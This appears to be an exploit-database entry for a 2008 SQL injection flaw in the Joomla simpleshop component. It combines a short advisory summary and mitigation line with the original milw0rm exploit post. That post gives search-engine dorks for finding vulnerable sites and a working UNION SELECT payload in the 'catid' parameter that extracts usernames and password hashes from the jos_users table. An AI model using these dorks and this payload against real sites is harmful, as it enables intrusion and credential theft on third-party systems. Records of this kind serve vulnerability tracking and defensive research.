Joomla Component simpleshop Remote SQL injection

vendor:

Component simpleshop

by:

His0k4

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Component simpleshop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component simpleshop Remote SQL injection

A vulnerability exists in Joomla Component simpleshop, which can be exploited by malicious people to conduct SQL injection attacks. The vulnerability is caused due to the 'catid' parameter in the 'browse' task not being properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow execution of arbitrary SQL code in the context of the webserver process.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/       Joomla Component simpleshop Remote SQL injection        \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_simpleshop
[*] Dork      :  inurl:com_simpleshop "catid"

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------
[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...

# milw0rm.com [2008-06-05]